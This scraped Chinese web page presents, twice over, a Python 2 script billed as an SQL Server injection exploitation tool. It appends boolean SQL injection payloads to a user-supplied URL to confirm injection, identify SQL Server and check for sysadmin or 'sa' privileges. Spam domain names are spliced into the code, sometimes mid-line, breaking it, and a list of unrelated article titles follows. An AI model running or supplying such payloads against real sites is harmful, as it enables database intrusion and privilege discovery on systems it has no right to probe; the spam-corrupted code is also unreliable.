Python编写检测数据库SA用户的方法
来源:互联网 发布:2017洗车软件app 编辑:程序博客网 时间:2024/06/05 22:36
本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:
# Code by zhaoxiaobu Email: little.bu@www.avcang.com
www.wnsr668.com
www.sepeizi.comhotmail.com
#-*- coding: UTF-8 -*-
from sys import exit
from urllib import urlopen
from string import join,strip
from re import search
def is_sqlable():
sql1="%20and%201=2"
sql2="%20and%201=1"
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
print "[信息]恭喜!这个URL是有注入漏洞的!n"
print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."
is_SQLServer()
else:
print "[错误]你确定这个URL能用?换个别的试试吧!n"
www.avcang.com
www.wnsr668.com
www.sepeizi.com
def is_SQLServer():
sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
if not search(judge,htmlcodes):
print "[错误]数据库好像不是SQL Server的!n"
else:
print "[信息]确认是SQL Server数据库!n"
print "[信息]开始检测当前数据库用户权限,请耐心等待......"
is_sysadmin()
www.avcang.com
www.wnsr668.com
www.sepeizi.com
def is_sysadmin():
sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[错误]当前数据库用户不具有sysadmin权限!n"
else:
print "[信息]当前数据库用户具有sysadmin权限!n"
print "[信息]检测当前用户是不是SA,请耐心等待......"
is_sa()
def is_sa():
sql = "%20and%20'sa'=(select%20System_user)";
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read() www.avcang.com
www.wnsr668.com
www.sepeizi.com
if not search(judge,htmlcodes):
print "[错误]当前数据库用户不是SA!n"
else:
print "[信息]当前数据库用户是SA!n"
print "n########################################################################n"
print " ^o^SQL Server注入利用工具^o^ "
print " Email: little.bu@hotmail.comn"
print "========================================================================";
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')
if url == '':
print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"
exit(1)
judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")
if judge == '':
print "[错误]判断字符串不能为空!"
exit(1)
is_sqlable()
# Code by zhaoxiaobu Email: little.bu@www.avcang.com
www.wnsr668.com
www.sepeizi.comhotmail.com
#-*- coding: UTF-8 -*-
from sys import exit
from urllib import urlopen
from string import join,strip
from re import search
def is_sqlable():
sql1="%20and%201=2"
sql2="%20and%201=1"
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
print "[信息]恭喜!这个URL是有注入漏洞的!n"
print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."
is_SQLServer()
else:
print "[错误]你确定这个URL能用?换个别的试试吧!n"
www.avcang.com
www.wnsr668.com
www.sepeizi.com
def is_SQLServer():
sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
if not search(judge,htmlcodes):
print "[错误]数据库好像不是SQL Server的!n"
else:
print "[信息]确认是SQL Server数据库!n"
print "[信息]开始检测当前数据库用户权限,请耐心等待......"
is_sysadmin()
www.avcang.com
www.wnsr668.com
www.sepeizi.com
def is_sysadmin():
sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[错误]当前数据库用户不具有sysadmin权限!n"
else:
print "[信息]当前数据库用户具有sysadmin权限!n"
print "[信息]检测当前用户是不是SA,请耐心等待......"
is_sa()
def is_sa():
sql = "%20and%20'sa'=(select%20System_user)";
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read() www.avcang.com
www.wnsr668.com
www.sepeizi.com
if not search(judge,htmlcodes):
print "[错误]当前数据库用户不是SA!n"
else:
print "[信息]当前数据库用户是SA!n"
print "n########################################################################n"
print " ^o^SQL Server注入利用工具^o^ "
print " Email: little.bu@hotmail.comn"
print "========================================================================";
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')
if url == '':
print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"
exit(1)
judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")
if judge == '':
print "[错误]判断字符串不能为空!"
exit(1)
is_sqlable()
0 0
- Python编写检测数据库SA用户的方法
- Python编写检测数据库SA用户的方法
- 修改Sybase数据库sa密码的方法
- MSSQL新建的数据库用户dbo没有sa登录名
- Sybase数据库修复及"sa"用户口令的恢复
- SQL Server 的sa用户无法附加数据库
- sqlserver 2013 sa用户添加sql数据库的映射 无法使用特殊主体sa
- SQL2005 sa islock 用户不能正常登录的处理方法
- SQL2005 sa islock 用户不能正常登录的处理方法
- SQL2005 sa islock 用户不能正常登录的处理方法
- SQL Server Sa用户的密码修改方法
- 创建对于用户sa失败,sa无法映射到数据库
- 讲解修改Sybase数据库sa密码的实用方法
- sql无法打开用户默认数据库,登录失败,用户‘sa’登录失败,错误:4064的解决方法
- sql无法打开用户默认数据库,登录失败,用户‘sa’登录失败,错误:4064的解决方法
- 关于数据库用户sa修改密码
- sa密码正确时,无法打开登录所请求的数据库 "xxx"。登录失败。 用户 'sa' 登录失败。
- 关于JDBC检测数据库用户的问题
- 解决Hbase的几个常见bug
- 编码详解
- C语言与JAVA语言中基本数据类型长度的比较
- 企业O2O网络营销的10大原则
- 凸包
- Python编写检测数据库SA用户的方法
- balanced ternary notation
- RabbitMQ工作队列之Python实现
- shell排序
- Python & 数据分析学习笔记[第1篇]
- 线段树入门(1)
- LR中,URL -based script与HTML -based script区别
- jQuery 事件方法
- -[算法导论]Dynamic Programming总结(没完成)